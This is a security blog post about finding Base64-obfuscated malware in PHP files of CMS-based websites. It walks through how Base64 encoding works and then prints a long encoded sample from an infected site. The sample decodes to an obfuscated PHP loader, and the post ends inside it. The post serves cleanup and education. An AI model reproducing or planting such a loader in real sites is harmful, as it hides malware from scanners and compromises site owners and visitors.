Last updated at Fri, 08 Dec 2017 16:28:51 GMT

## Synopsis

As a security professional, I find myself doing more malware removal from websites that are run using either WordPress, Joomla or Drupal.  Most of what I find are php files that are riddled with base64 code.  This code is great for threat actors to hide their invasive malware from malware scanners.  I want to show you how to find this code and show what is hidden in your php files.

## What is Base64?

Base64 is a code that represents either binary or text in ASCII code.  It consists of letters ranging from A to Z, a to z, 0 to 9 and the symbols + and /.  To really understand Base64 I want to break it down for you.  There are a few steps you must go through to just convert one letter, we will work with the word “HELP”.  I will setup a table that will help break this down for you.  First thing lets put the letters of “HELP” in the first row and the the ASCII code for each letter.

 Letter H E L P ASCII 72 69 76 80
Next we need to convert the ASCII number to a 8 bit binary.  Need to know how binary works?  Here is a real quick howto.  Binary starts from right to left and has either a 0 or a 1.  0 means off and 1 means on.  Let’s start with 72, you will see the binary number is 01001000.  If you start with the 0 on the right that is the placement (or bit) for the number 1 and since it’s a 0 (which means off) we do not add the number 1.  The next 0 from the right is in the placement for the number 2 and that is also 0, so no adding that number.  The third from the right is the placement number 4 and the next one will be 8 and then 16, 32 and 64.  See where I am going with this?  So if we add the bits that have a 1 we get 8 plus 64 which equals 72, our ASCII number.
 Letter H E L P ASCII 72 69 76 80 Binary 8bit 01001000 01000101 01001100 01010000
Now that we have our 8 bit binary we need to make it 6 bit.  So take the first 6 bit placement numbers from the left and put them in their own cell
 Letter H E L P ASCII 72 69 76 80 Binary 8bit 01001000 01000101 01001100 01010000 binary 6bit 010010 000100 010101 001100 010100 00 Index 18 4 21 12 20 0 Base64
With our 6 bit binary in place we need convert it to a number.  The same concept applies here with the 8 bit conversion.  Take the first bit on the right and add 1 if it is a 1.  Second bit from the right is 2 and it’s a 1 so we add 2.  The next bit that is on is the second bit from the left which is 16.  So if we add 16 plus 2 we get 18.
 Letter H E L P ASCII 72 69 76 80 Binary 8bit 01001000 01000101 01001100 01010000 binary 6bit 010010 000100 010101 001100 010100 00 Index 18 4 21 12 20 0 Base64 S E V M U A
The Index number will associate to a Base64 letter, number or symbol.  If you notice on the last cell, in the Index row, we have a 0.  The binary above it was what was left over from converting the 8 bit binaries to 6 bit binaries.  Since our last bits are 00 are number would be 0 which represents A in Base64.
 Letter H E L P ASCII 72 69 76 80 Binary 8bit 01001000 01000101 01001100 01010000 binary 6bit 010010 000100 010101 001100 010100 00 Index 18 4 21 12 20 0 Base64 S E V M U A
Lets check if this is correct.  There are a few websites that will convert base64 code for you automatically, click [here](https://www.base64decode.org/) to check the code.  In the first box type in the base64 code SEVMUA and then press Decode.  The word HELP should now show in the bottom square.

Here is an example of some code I found in a php file that had malware.

Base64 code

``````aWYgKCFkZWZpbmVkKCdBTFJFQURZX1JVTl8xYmMyOWIzNm
YzNDJhODJhYWY2NjU4Nzg1MzU2NzE4JykpCnsKZGVmaW5lKCdBTFJFQURZX1JVTl8xYmMyOWIzNmYzNDJhODJhYWY2NjU4Nzg1MzU2NzE4JywgMSk7CgogJ
HJvY2hncXh5cGsgPSA5ODgwOyBmdW5jdGlvbiB1c2F6amR3Y3psKCRqa2hpZHB3b3FyLCAkeGRwa3Z3KXskemh6cm9vID0gJyc7IGZvcigkaT0wOyAkaSA8
IHN0cmxlbigkamtoaWRwd29xcik7ICRpKyspeyR6aHpyb28gLj0gaXNzZXQoJHhkcGt2d1skamtoaWRwd29xclskaV1dKSA/ICR4ZHBrdndbJGpraGlkcHd
vcXJbJGldXSA6ICRqa2hpZHB3b3FyWyRpXTt9CiR4enRmc2l3cz0iYmFzZSIgLiAiNjRfZGVjb2RlIjtyZXR1cm4gJHh6dGZzaXdzKCR6aHpyb28pO30KJG
V1dmNsdXh4eWQgPSAnb2R1ZkphT1BBWm8zVmlhQ2hqT0NaaVlXQUNoSE42YmF3NnJlRXI5cG9kdWZKYU9QQVpvM1ZpWVcnLgonQTRPdWhSVldoUnZSMnNJc
nB3SGxzenhlRmp1bWhpYTlwc2M3cVoxbUFaMXVxR2E5SjhPZlpHVGVGOExSMnNJcnB3SGxzenh1aCcuCidSVldodU9DQVp4V2hSVGVGamgzdnN6blVvZUlo
aWE5WkdUZUY4YW1GZHU3SlpvM3Zzem5VJy4KJ28zbHN0OXBKOHEzTjhUdUFqdWZBOG8zTnV4Tkx5T3l3OXI1cFF6bHNSSGxzNUl0TnN4ekE4QWVGakwzTnV
4Tkx5T3l3OScuCidyNTJzSTVaZFM1cHdIbHNSOWxzdDlwSjhxM044VHVBanVmQThvM056VFZMemFVYTZPUThhT3dUYXh4THp5THc0TjVwUXpsc1JIbHM1SX
ROc3h6Jy4KJ0E4QWVGakwzTnpUVkx6YVVhNk9ROGFPd1RheHhMenlMdzRONTJzSTUyQ05lRXI5cG1vOXBVb2VlQTVJM044VHVBanVmQThvM1Y5eXZMemF4V
Hl1bUx1YUVaUDYnLgonOWxkdlNsaWxqbEJOUHFqNlN2ankxQWp6aUVLVmVxOE5ZbGp5OUo4WFlFc2hlcG85cGtyOXBOc0l0TmRUdUFqdWZBUXRSb0xZUVRM
eTY4YU9RYScuCidMYm12d285cVB0R3FpcWl2Qmw1cXd0Q3E4eWpKd3FTaGp1MXFCNmlxWlRlRlA2U1ZDcnR2UXpuVW8zbHM1SXROc0l6QWR5OXFRSU9OJy4
KJzZiYXc2cm5VbzN0TnNJdFZkVDFjZHltSmlhYk5VOXR3dWF2d1VIbHN0OXBOc0l0TnNUS3c2T3NvTFl3OENjQmg0TzFjWlQzVjQ5dCcuCidnUUlSQWR2Q0
U4b1lFZDY3QWR5QnZROTlxd05iMjhONHFqbzdxd3pHcVAxNUF3Y3VxOE45VlBIbHM1SXROc3hSRmRPNXE4cnRWZGxQWml5Jy4KJzRjZHRuVW8zbHN0OXBOc
0l0TmRBNEZqbDlKOE9mTmRsUFo5Y3VjNjFXaEdvM3BvOXBOc0l0TktIbHM1SXROc0l0TnNJdGhqYTljWlZmTktsOWhSVFdGZE9HQVpOM2hLVnVBNE8nLgon
Q0FaeEhxOGx1cHNoV1o1MUdjR2NYQVJUcnBhcmYyaXpSMnNoUjI2SXpaNGx5THVBeUx1SFJReVRMTHlPTnc0bExWNDllcHdIbHM1Jy4KJ0l0TnN4T1VvM2x
zNUl0TnN4amM4YkJjZHVXRjV4Qmg0T0tBWlRaaGp1OXE4VkhBTFRlaFJ2M3BvOXBOc0l0TktIbHM1SXROc0l0Jy4KJ05zSXRWS1Z1aENJT042eUNoanlicH
N6blVvM2xzNUl0TnNJdE5zSXRWZHlmcThZYmhHdVBaR3k0QVphdU5VOXRvWlZDcScuCidaejNwd0hsc3Q5cE5zSXROc0l0TnNJenE4YjFGS3VQa1psbWhaY
XVjOGFGWlFJT05kbFBaOWN1YzZUV3E0VldGR28zcHdIbHMnLgondDlwTnNJdE5zSXROc0l6aGlhSEF1T3JxWlQzTlU5dFZ5T3dUYVY4VGFWRlY0bFVMenVv
YXlPZFFMWXl3enlsVFFjY0VyOXBOc0l0TnNJdE5zeEdKZHVIQVFJMycuCidwc1RQRmR5UEpzSU9OS2w5aFJWckZHdjNWS2x1RmRBbWhkeTlKc3J0VDZ1UVR
MbEx3NFZBWjRseUw2eVFvYVRnTDV6ZU5zNk9nUXhkb0xZd1QnLgonUXpsczVJdE5zSXROc0l0a3I5cE5zSXROc0l0TnNJdE5zSXRWS2x1RmRBbWhkeTlKc0
lPTktsNHFSbDloNXR6aGlhSEF1T3JxWlQzMicuCidzSXIyc0l6aGlZMWhpdGVFcjlwVW8zdE5zSXROc0l0TnNJdE5zeGVBNUkzVktsdUZkQW1oZHk5SnNJT
2dReEJoNE9LQVpUNkZpbFFGaU85cHN6ZVVvJy4KJzN0TnNJdE5zSXROc0l0TnN4blVvM3ROc0l0TnNJdE5zSXROc0l0TnNJdHFSVnVxOEhuJy4KJ1VvM3RO
c0l0TnNJdE5zSXROc3hPVW8zbHM1SXROc0l0TnNJdE5zSXROZHVqTnMxUGNLVkhBOFMzVktsdUZkQW1oZHk5SnMnLgonemVVbzN0TnNJdE5zSXROc0l0TnN
4blVvM3ROc0l0TnNJdE5zSXROc0l0TnNJdFZkeWZxOFliaEd1UFpHeTRBWmEnLgondTg0OXRnUUl6aGlhSEF1T3JxWlQzRXI5cE5zSXROc0l0TnNJdE5zSX
RtbzlwTnNJdE5zSXROc3hPVW8zbHM1SXROc0l0TnNJdEFqT0NBOHlCSnNJM1ZkeWZxOFliaCcuCidHdVBaR3k0QVphdU5keVBOc1RCY1pWQ0E4YjlaaVRla
DV6bHM1SXROc0l0TnNJdGtyOXBOc0l0TnNJdE5zSXROc0l0SjhxdHBzeWVGdU8xaFJWMWtRdHpxR2FDaGphZmN5T3onLgonSlpOSE5zVENBWnZlcG85cE5z
1cUdUV2hSdXZKWmw5cHNUQmNaVkNBOGI5WmlUZWg1emVFcjknLgoncE5zSXROc0l0TnNJdE5zSXRtbzlwTnNJdE5zSXROc3hPVW8zbHM1SXROc0l0TnNJdG
hqYTljWlZmTmRsUFo5bDNBOGxEYUdWZWNkeTVGZEwzcVpWQ3FaJy4KJ3VtYzhiZWhaYXVwc1RDQVp2ZXB3SGxzNUl0TnN4T1VvM2xzNUl0TnN4amM4YkJjZ
HVXRjV4Qmg0TycuCidVSmRhQko0Y0NKWlQxcWpZdXBzVHpKWlZtRmR1UGNzemxzNUl0TnN4blVvM3ROc0l0TnNJdE5zVHpKWlZtRmR1UGN5T0doanU5cThW
SEFRSU9ONnlDaGp5YnBzJy4KJ3puVW8zbHM1SXROc0l0TnNJdEFqT0NBOHlCSnNJM1ZkVGVodU9ISlpsOU5keVBOc1R6SlpOZVVvM3ROc0l0TnNJdE5LSGx
zNUl0TnNJdCcuCidOc0l0TnNJdE5kdWpOczFJSlpsbWNHVmVjZHk1RmRMM1ZkVGVoNXp0VjVxdEpabG1BZHVDcHNUekpaTmVwbzlwTnNJdE5zSXROc0l0Tn
NJdGtyOXBOc0l0TnNJdCcuCidOc0l0TnNJdE5zSXROc1R6SlpWbUZkdVBjeU9HaGp1OXE4VkhBYTdjTlU5dFZkVGVoQkhsczVJJy4KJ3ROc0l0TnNJdE5zS
XROSzlsczVJdE5zSXROc0l0bW85cFVvM3ROc0l0TnNJdE5LVnVjS2FDRjVJekFkdUNaaVllaEdUbWNHVmVjZHk1RmRMblUnLgonbzN0TnNJdG1vOXBVbzN0
TnNJdEFSYWZxR1RlRmlTdHFHbG1UaWE5VGR1Q0E4bDlGR1Zid2R1Jy4KJ1Bjc3R6QWR1QzJzSXpBZGFyY2R0T3Z3SWVVbzN0TnNJdGtyOXBOc0l0TnNJdE5
zSXpoamFQYzhZOU5VOXRxWlYnLgonQ3FaejNwd0hsc3Q5cE5zSXROc0l0TnN4ZUE1STNOOHVQWmlUZWg1dHpBZHVDcFF6bHM1SXROc0l0TnNJdGtyOXBOc0
l0TnNJJy4KJ3ROc0l0TnNJdGhqYTljWlZmTnNUQ0FabDRGS29uVW8zdE5zSXROc0l0Tks5bHN0OXBOc0l0TnNJdE5zSXpoamFQYzhZOTg0OXRnUUl6QWR1Q
0VyOXBOc0l0TnNJdE5zSXpBJy4KJ2R1Q1ppbFdjOGI5TlU5dHZVSGxzdDlwTnNJdE5zSXROc3hlQTVJM1ZkVHVoS1QzTlVydHYnLgonUXpsczVJdE5zSXRO
c0l0a3I5cE5zSXROc0l0TnNJdE5zSXRoamE5Y1pWZk5zVENBWmw0RktvblVvM3ROc0l0TnNJdCcuCidOSzlsc3Q5cE5zSXROc0l0TnNJekFkdUNOVTl0aEd
UQ0ZkYWZwc1R6SlpOZU5VOU9OVTZ0Z0NJekFkdUNOVTMnLgondGhSVENKODkzVmRUZWg1cnRWNFloMkNoZUVyOXBOc0l0TnNJdE5zSXpKc0lPTjZ4V2hkYW
ZBZHVDcHNUeicuCidKWk5lRXI5cE5zSXROc0l0TnN4ZUE1STNWZHR0Z3c5T042QXh3eWx5cG85cE5zSXROc0l0TnN4blVvM3ROc0l0TnNJdE5zSXROc3hDQ
VpUNGgnLgonalN0VktWdWhHYUhjVUhsczVJdE5zSXROc0l0bW85cFVvM3ROc0l0TnNJdE5LYzNKOFl1TnN0M1ZkcXRnUXhDQTh5ekFkdUNwc1QzcFF6dE53
OU9ONkF4d3lseXBvOXBOc0knLgondE5zSXROc3huVW8zdE5zSXROc0l0TnNJdE5zeGVBNUkzVmRxdE53OU9Oc2hmVkN4MUZqb3RWZHF0Tnc5T05zaGYyNWh
lVW8zdE5zSScuCid0TnNJdE5zSXROc3huVW8zdE5zSXROc0l0TnNJdE5zSXROc0l0VmRsNGhSVnVGUlRtQWR1Q05VOXRONVR6SlpOV1ZkcTVFcjlwTnMnLg
onSXROc0l0TnNJdE5zSXROc0l0TmR1ak5zMWVoNE96SlpOM1ZkbDRoUlZ1RlJUbUFkdUNwUXpsczVJdE5zSXROc0l0TnNJdE5zSXROc3huVW8zdE5zSXROc
0l0TicuCidzSXROc0l0TnNJdE5zSXROc1R6SlpWbXFpTzRGUm90cFA5dHZ3SGxzdDlwTnNJdE5zSXROc0l0TnNJdE5zSXROc0l0TicuCidzSXpoamFQYzhZ
OTg0OXRnUUl6cUdhQ2hqYWZjeU96SlpOblVvM3ROc0l0TnNJdE5zSXROc0l0TnNJJy4KJ3ROc0l0TnNUQ0FabDRGS290Z1F4MWhSVjFrYU83QVpWUkFRdHp
oamFQYzhZOTJzeEJoNE9LQVpUNkpaJy4KJ1Z1cUdUV2hSdXZKWmw5cHNUQmNaVkNBOGI5WmlUZWg1cnRWZFR1aEtUM05zWHR2d0llcCcuCid3SGxzNUl0Tn
m5VbzNsczVJdE5zSXROc0l0aGphOWNaVmZOc1RDQVpsNEZLb25VbzN0TnNJdG1vOXBVbzN0TnMnLgonSXRBUmFmcUdUZUZpU3RxR2xtVGlhOVRkT0JMak9X
Y3N0ZVVvM3ROc0l0a3I5cE5zSXROc0l0TnNJekFkT0Joak9XY3lPdUZqb3RnUXhQY0tWQ2hkT1Bwc1RtTDlhUWF6YScuCidROENjd280VlZMeVRtVHp1dlR
MYnh3TExSWlFydFZ5T3dUYVY4VGFWRlY0VnlMYWF5TDRUbWFhVlZWNDllRXI5cE5zSXROc0l0TicuCidzeGVBNUkzVmRUV3FHVldGR1RtQThiek5VOU9nUX
hkb0xZd1RRemxzNUl0TnNJdE5zSXRrcjlwTnNJdE5zSXROc0l0TnNJdGhqYTljWlZmTnNUbUw5YVFhemFRJy4KJzhDYzZ3OWxhd0xhRWF5T1F3OU9MVjQ5b
lVvM3ROc0l0TnNJdE5LOWxzNUl0TnNJdE5zSXRBOFlQQTh1ak5zdHpBZE9CaGpPV2N5T3VGam90Z3c5T05VSWVVbycuCiczdE5zSXROc0l0TktIbHM1SXRO
c0l0TnNJdE5zSXROS1Z1Y0thQ0Y1STUyQ05uVW8zdE5zSXROc0l0Tks5bHM1SXROc0l0TnNJdEE4WVAnLgonQW85cE5zSXROc0l0TnN4blVvM3ROc0l0TnN
JdE5zSXROc3hDQVpUNGhqU3RoR2E1aEdUQ3BzVG1MOWFRYXphUTgnLgonQ2N3bzRWVkx5VG1UenV2VExieHdMTFJaUXJ0dnNydFZkVFdxR1ZXRkdUbUE4Yn
pwd0hsczVJdE5zSXROc0l0bW85cE5zSXROSzknLgonbHN0OXBOc0l0TmR1ak5zdDFBUmFmcUdUZUZpYm1BWjFlaEdUUHBzY2pKOFl1Wkd4NGN5T0JGaWI5Q
ThiOScuCidoQ2hlcG85cE5zSXROS0hsczVJdE5zSXROc0l0QVJhZnFHVGVGaVN0QWp1SEFhT3JjWlRtcWlPZmNkYWZjS3YzVmRTSE5zVHoyc0l6QWpZMUFD
SU9ONkExRicuCidLbHVwbzlwTnNJdE5zSXROc3huVW8zdE5zSXROc0l0TnNJdE5zSXpGOE96QVFJT05zVGpGZHlSTlU5T05VdHRnQ0lScVFodEU1SVJjQ2h
uVW8zdE5zSXROc0l0TnNJdE4nLgonc0l6QTVJT042eGpGR3h1RjV0ekY1cnRWZDRXQWRMZUVyOXBOc0l0TnNJdE5zSXROc0l0SjhxdHBzVGpOVTlPZ1F4ZH
E4WVBBUXpsczVJdE5zSXROc0l0TnNJdE5LSCcuCidsczVJdE5zSXROc0l0TnNJdE5zSXROc3hDQVpUNGhqU3R2VUhsczVJdE5zSXROc0l0TnNJdE5LOWxzN
Ul0TnNJdE5zSXROc0l0TmRhSGhpTGxzNUl0Jy4KJ05zSXROc0l0TnNJdE5LSGxzNUl0TnNJdE5zSXROc0l0TnNJdE5zeGVBNUkzSlpsbXFaVkNxWnozVmRv
ZXBRSXpBc0lPTmR1N2hkWVdBZEwzVmRvZUVyOScuCidwTnNJdE5zSXROc0l0TnNJdE5zSXROc1Q1a1pUdWg0T0doanU5Y2RhZk5VOXRBUmNDSlpUdXBzVGo
yc0knLgonekFzem5VbzN0TnNJdE5zSXROc0l0TnNJdE5zSXRBamxIRkdsdXBzVGpwd0hsczVJdE5zSXROc0l0TnNJdE5zSXROc3hDQVpUNGgnLgonalN0Vm
RWYmNkYVBaR2NDSlpUOUE4U25VbzN0TnNJdE5zSXROc0l0TnN4T1VvM3ROc0l0TnNJdE5LOWxzNUl0Jy4KJ05zeE9VbzNsczVJdE5zeGVBNUkzTjhBNEZqb
DlKOE9mWmlhU0pabDloQ3RSQWp1SEFhT1JBJy4KJ1pUbXFpT2ZjZGFmY0t2UnBRemxzNUl0TnN4blVvM3ROc0l0TnNJdE5kQTRGamw5SjhPZk5kQWVGZGFt
QWlhOVppbFdGUlR1RlJUUHAnLgonc1RqSjhZdUZqeTdBUXpsczVJdE5zSXROc0l0a3I5cE5zSXROc0l0TnNJdE5zSXRWZEEzcThiekZkTHRnUXhqRkd4dUY
1dHpBanVIQScuCic4YjFGOExITnNWQ041em5VbzN0TnNJdE5zSXROc0l0TnNJekFqbFdGUlR1RlJUUE5VOXRBUlZ1cThvM1ZkQTNxOGJ6RmRMSE5kQWUnLg
onRmRhUEpaZXVwc1RqSjhZdUZqeTdBUXplRXI5cE5zSXROc0l0TnNJdE5zSXRBamxIRkdsdXBzVGpKZHlmQWRZdXB3SGxzdDlwTnNJdE5zSXROc0l0TnNJd
GhqYTljWlZmTnMnLgonVGpxaU9mY2RhZmNLdm5VbzN0TnNJdE5zSXROSzlsczVJdE5zeE9VbzNsc3Q5cE5zSXROZEE0RmpsOUo4T2ZOZGxQWmlUdXFHVmJo
S1RtaGQxMWhpTDNWZFQxY2Q2SE5zVCcuCidEQVp6ZVVvM3ROc0l0a3I5cE5zSXROc0l0TnNJekZHYTlaaVQxY2Q2dGdRSTVOQkhsc3Q5cE5zSXROc0l0TnN
4akZHJy4KJ050cHNUZWd3SW5Oc1RlZ0tsOWhqWXVGNXR6QWR5OXFRem5wbzlwTnNJdE5zSXROc3huVW8zdE5zSXROc0l0TnNJdE5zeGpGR050cHNUTWd3SW
5Oc1RNZ0tsJy4KJzloall1RjV0ekppYWJwUUlqVjVJekp3WVBjS1ZIQThTM1ZkVDFjZDZlRUNJeko1SEQyc0l6SlFIRHBvOXBOc0l0TnNJdE5zSXROc0l0a
3I5cE5zSXROc0l0TnNJdE5zSXROcycuCidJdE5zVFdjWlRtQWR5OXFRSWZnUXhCSktOM0ZHVnpwc1R6cVpUMThDVGVaUXp0WjV4V2hqbzNWZDd1a2FIekp1
OWVwd0hsczVJdCcuCidOc0l0TnNJdE5zSXROSzlsczVJdE5zSXROc0l0bW85cFVvM3ROc0l0TnNJdE5LVnVjS2FDRjVJekZHYTlaaVQxY2Q2Jy4KJ25VbzN
0TnNJdG1vOXBVbzN0TnNJdEFSYWZxR1RlRmlTdHFHbG1BZGFCaFJ1cmNzdHpBZHk5cVFydFZkN3VrUXpsczVJdE5zeG5VbzN0TnNJdE5zSXROZGNIRmlWMU
mx1cHNUenFaVDEyc0l6SmlhYnBRcnRWZGxQWml5NGNkdGVFcjlwTnNJdE5LOWxzNUl0TnN4amM4YkJjZHVXRjV4Qmg0T3VGamxDaycuCidaeDlwc1R6cVpU
8zdE5zSXRBUmFmcUdUZUZpU3RxR2xtQWp1SEFhT0NBOHl6cHNUJy4KJ3JxWlQzcG85cE5zSXROS0hsczVJdE5zSXROc0l0VmRUMWNkNnRnUXhJQWp1SEFhT
1JBWlRtcWlPZmNkYWZjS3YzVkt4MWNkdGVFcjlwVW8zdE5zSXROc0l0TktWdWNLJy4KJ2FDRjVJekFkeTlxd0hsczVJdE5zeE9VbzNsczVJdE5zeGpjOGJC
Y2R1V0Y1eEJoNE9qSjhZdVpHY0NKWlR1cHNUcnFaVDMyJy4KJ3NJekFkeTlxUXpsczVJdE5zeG5VbzN0TnNJdE5zSXRONnhqSjhZdVpHeDRjeU9CRmliOUE
4YjloQ3R6aGR5OUpzcnRWZFQxY2Q2ZUVyOXBOc0l0Tks5bHN0OXBOc0l0TmRBJy4KJzRGamw5SjhPZk5kbFBaaUFlRmRhbXFaeHJBOGJ6cHNUcnFaVDMyc0
l6QWR5OXFRemxzNUl0TnN4blVvM3ROc0l0TnNJdE42eGpKOCcuCidZdVpHeDRjeU9CRmliOUE4YjloQ3R6aGR5OUpzcnRWZFQxY2Q2SE5VdGVFcjlwTnNJd
E5LOWwnLgonc3Q5cE5zSXROZEE0RmpsOUo4T2ZOZGxQWkdsV2hSVG1xaU83aGR5Q0FaTjNWZDZITnNUNXBvOXBOc0l0TktIbHM1SXROc0l0TnNJdGhqJy4K
J2E5Y1pWZk5LbDloall1RjV0enFRenQyUXhQY0tWSEE4UzNWZE5lRXI5cE5zSXROSzlsc3Q5cE5zSXROZEE0RmpsOUonLgonOE9mTmRsUFo5Y3VjNmxXRjg
0V0Z1bDlGR1YxQWlMM1ZkVGVoUnZPd3VhdndzemxzNUl0TnN4blVvMycuCid0TnNJdE5zSXROc1RQQThZalppVGVoNUlPTmRUZWhqYjFGOEwzWjRPZFFMWX
laNFhlRXI5cFVvM3ROc0l0TnNJdE5zVEJGaTQ3RmlibUZqeTdBWnZ0Z1F4eGhSVjFrUScuCid0NUZHeDlKOE9maENOSE5zVmlKOGFHaENOSE5zVnJxOGN1a
ENOSE5zVlBBWmxQSjhPZmhDTkhOc1ZQY2R5OWhDTkhOc1Y0aGlhQ2hDTkhOcycuCidWMWhSVGVxaVl1aENOSE5zVnpjODRyTjVydE5qMXVxOFR1aFJ2NTJz
STVGZHU1aENOZUVyOXBVbzN0TnNJdE5zSXROc1Q5Rlp4bUFkdUNOVTl0VktsdUZkQW1BZCcuCid1Q05zU3RONVg1TnNTdFZkbFdGODRXRnVPZnE4NHVoNDd
FhT3VrZHVQY0t2M1ZLVDdoeU96SlpOZXBvJy4KJzlwTnNJdE5zSXROc3huVW8zdE5zSXROc0l0TnNJdE5zeENBWlQ0aGpTdFZLVDdoeU96SlpOblVvM3ROc
dE5LVnVjS2FDRjVJemNkNHJaaVRlaEJIbHM1SXROc0l0TnNJdG1vOXBVbzN0TnNJdE5zSXROS1Z1Y0thQ0Y1STVOQkhsczVJdE5zJy4KJ3hPVW8zbHM1SXR
R5OXFRSU9OZFYxaGlMaWx5T3pBOGxXQWRMM1ZkVjFoaUxpbHlPenFaVDFwd0hsc3Q5cE5zSXROc0l0TnMnLgonSXpoR1RXaGp5UkFhT3JxWlQzTlU5dHFHb
G1UaWE5b2lPN0Y4T2ZMR1RXaGp5UkFRdGVOcycuCidTdE41WDVFcjlwTnNJdE5zSXROc0l6aEdUV2hqeVJBYU9ycVpUM05VOXRWS2w5RkdWMUFpYW1oZHk5
nLgond0hsc3Q5cFVvM3ROc0l0TnNJdE5kbFBaaUFlRmRhbWNHVmVjZEwzVktsOUZHVjFBaWFtaGR5OUpzcicuCid0cUdsbUE4YkJoUnVyY3N0ekFkeTlxUX
J0cUdsbVRpYTlRZE9QY3N0ZXBRem5VbzN0TicuCidzSXRtbzlwVW8zdE5zSXRBUmFmcUdUZUZpU3RxR2xtaGRZNEFpdWZaR1Z1RlF0ekZqeTdBUXpsczVJd
c0l0VktsOUZHVjFBaWFtaGR5OUpzJy4KJ0lPTnNUUGNkT0NxOGN1Wkd4MWNkdHQyNXhQYzhWUGNLTjNGOG80cHNWQnE4bDNBUU5lMnNJcjJzSTRwUUlmTnN
WbU41SWZOZDR6bFF0ekZqeScuCic3QVFJZk5kbFBaOWN1YzYxV2hHbzNwUXpuVW8zbHM1SXROc0l0TnNJdEo4cXRwZEFlRmRhbUFaMWVoR1RQcHNUUGNkJy
4KJ09DcThjdVpHeDFjZHRlcG85cE5zSXROc0l0TnN4blVvM3ROc0l0TnNJdE5zSXROc3hJYzhiSEo4YkRwc1RQY2RPQ3E4Y3VaR3gxY2R0ZUVyJy4KJzlwT
nNJdE5zSXROc3hPVW8zdE5zSXRtbzlwVW8zdE5zSXRBUmFmcUdUZUZpU3RxR2xtaGRZNEFpdWZaaVlXcThvM1ZkYjFGOExPd3UnLgonYXZ3c3psczVJdE5z
eG5VbzN0TnNJdE5zSXROc1RQY2RPQ3E4Y3VaR3gxY2R0dGdReEJoNE9LQVonLgonVFVGaTQ3Rmlid2NkT0NxOGN1cHN6blVvM2xzNUl0TnNJdE5zSXRKOHF
0cGR1UFppVGVoNXR6aEdUV2hqeVJBYU9ycVpUM3BRemxzNUl0TicuCidzSXROc0l0a3I5cE5zSXROc0l0TnNJdE5zSXRKOHF0cHNUZnE4NHVOVTlPTjZiYX
c2cmVOc1hXTmRZV3E4b3RxOFlITkt4SGM4Y2UnLgonRlJ2bHM1SXROc0l0TnNJdE5zSXROS0hsczVJdE5zSXROc0l0TnNJdE5zSXROc3hqRkdWdXE4bDNOc
zFQcWl5ZkFkdUNwc1RQY2RPQ3E4Y3VaR3gxY2R0ZU5keVAnLgonTnNUREFaek9nNVRyRkthUko4Ym1Gank3QVF6bHM1SXROc0l0TnNJdE5zSXROc0l0TnN4
blVvM3ROc0l0TnNJdE5zSXROc0l0TnNJdCcuCidOc0l0TmR1ak5zMVBjS1ZyRkd2M1ZLeEhjOGNlRnVPZnE4NHUyc3hQYzhWUGNLTjNGOG80cHNWQnE4bDN
BUU5lMnNJcjJzSTRwUXp0Tnc5T042QTFGS2x1cG85cE5zSXROc0l0Jy4KJ05zSXROc0l0TnNJdE5zSXROc3huVW8zdE5zSXROc0l0TnNJdE5zSXROc0l0Tn
2VGdU9mcTg0dXBRJy4KJ3J0cUdsbVRpYTlRZE9QY3N0ZXBRem5VbzN0TnNJdE5zSXROc0l0TnNJdE5zSXROc0l0Tks5bHM1SXROc0l0TnNJdE5zSXROc0l0
TnN4T1VvM3ROc0l0TnNJJy4KJ3ROc0l0TnN4T1VvM3ROc0l0TnNJdE5zSXROc3h1RktsdVVvM3ROc0l0TnNJdE5zSXROc3huVW8zdE4nLgonc0l0TnNJdE5
zSXROc0l0TnNJdFZLbDlGR1YxQWlhbWhkeTlKc0lPTnNUUGNkT0NxOGN1Wkd4MWNkdHQyNUk1MkNOdDI1eFBjOFZQY0tOM0Y4bzRwc1ZCcThsM0FRTmUyc0
lyJy4KJzJzSTRwUUlmTnNWbU41SWZOZDR6bFF0ekZqeTdBUUlmTmRsUFo5Y3VjNjFXaEdvM3BRem5VbzNsczVJdE5zSXROc0l0TnNJdE5zSXROc3hlQTVJM
0FqdUgnLgonQWFPdWtkdVBjS3YzVktsOUZHVjFBaWFtaGR5OUpzemVVbzN0TnNJdE5zSXROc0l0TnNJdE5zJy4KJ0l0a3I5cE5zSXROc0l0TnNJdE5zSXRO
c0l0TnNJdE5zeElBWkExRnMxQmg0T3pBOGxDa1p4OXBkbFBaaUFlRmRhbWhqJy4KJ2ExQXN0emhHVFdoanlSQWFPcnFaVDNwUXJ0cUdsbVRpYTlRZE9QY3N
0ZXBRem5VbzN0TnNJdE5zSXROc0l0TnNJdCcuCidOc0l0bW85cE5zSXROc0l0TnNJdE5zSXRtbzlwTnNJdE5zSXROc3hPVW8zdE5zSXRtbzlwVW8zdE5zSX
RBUmFmcUdUZUZpU3RxR2xtY0dWZWNkeTVGZGFtcWkxdXFpSDNwJy4KJ285cE5zSXROS0hsczVJdE5zSXROc0l0SjhxdHBLbDloall1RjUxQmg0T0tBWlRVR
mk0N0ZpYndjZE9DcThjdXBzJy4KJ3plTnM2T05VSWVVbzN0TnNJdE5zSXROS0hsczVJdE5zSXROc0l0TnNJdE5LVnVjS2FDRjV4TGhSYXVFcicuCic5cE5z
SXROc0l0TnN4T1VvM3ROc0l0TnNJdE5kYUhoaUxsczVJdE5zSXROc0l0a3I5cE5zSXROJy4KJ3NJdE5zSXROc0l0aGphOWNaVmZONkExRktsdUVyOXBOc0l
0TnNJdE5zeE9VbzN0TnNJdG1vOXBVbzN0Jy4KJ05zSXRBak9DQTh5QkpzSTNWeU9VdzlPMlFMTHRxWnZ0VmQ3dWt3OStWS0ExRkthdXBvOScuCidwTnNJdE
5LSGxzNUl0TnNJdE5zSXRWZFQxY2Q2dGdRSXpjanlIYzhMblVvM3ROc0l0TnNJdE5zVHpxWlQxWmk3dWtRSU9Oc1REQVp6blVvM3ROc0knLgondG1vOXBVb
zN0TnNJdEo4cXRwczZ6QWR5OXFRemxzNUl0TnN4blVvM3ROc0l0TnNJdE5kQVdoamExcWl0dHBzVG1MNk93YScuCidzeDFoQ0l6SmlhYmd3U3pjanlIYzhM
ZVVvM3ROc0l0TnNJdE5LSGxzNUl0TnNJdE5zSXROc0l0TnNUenFaVDFOVTl0VksnLgonQTFGS2F1RXI5cE5zSXROc0l0TnNJdE5zSXRWZFQxY2R5bUppYWJ
OVTl0VmQ3dWt3SGxzNUl0TnNJdE5zSXRtbzlwTnNJdE5LOWxzJy4KJ3Q5cE5zSXROc1R6cVpUMU5VOXRvS2FmaGlhQ0o4eUhKWmV1cGRsUFppVHVxR1ZiaE
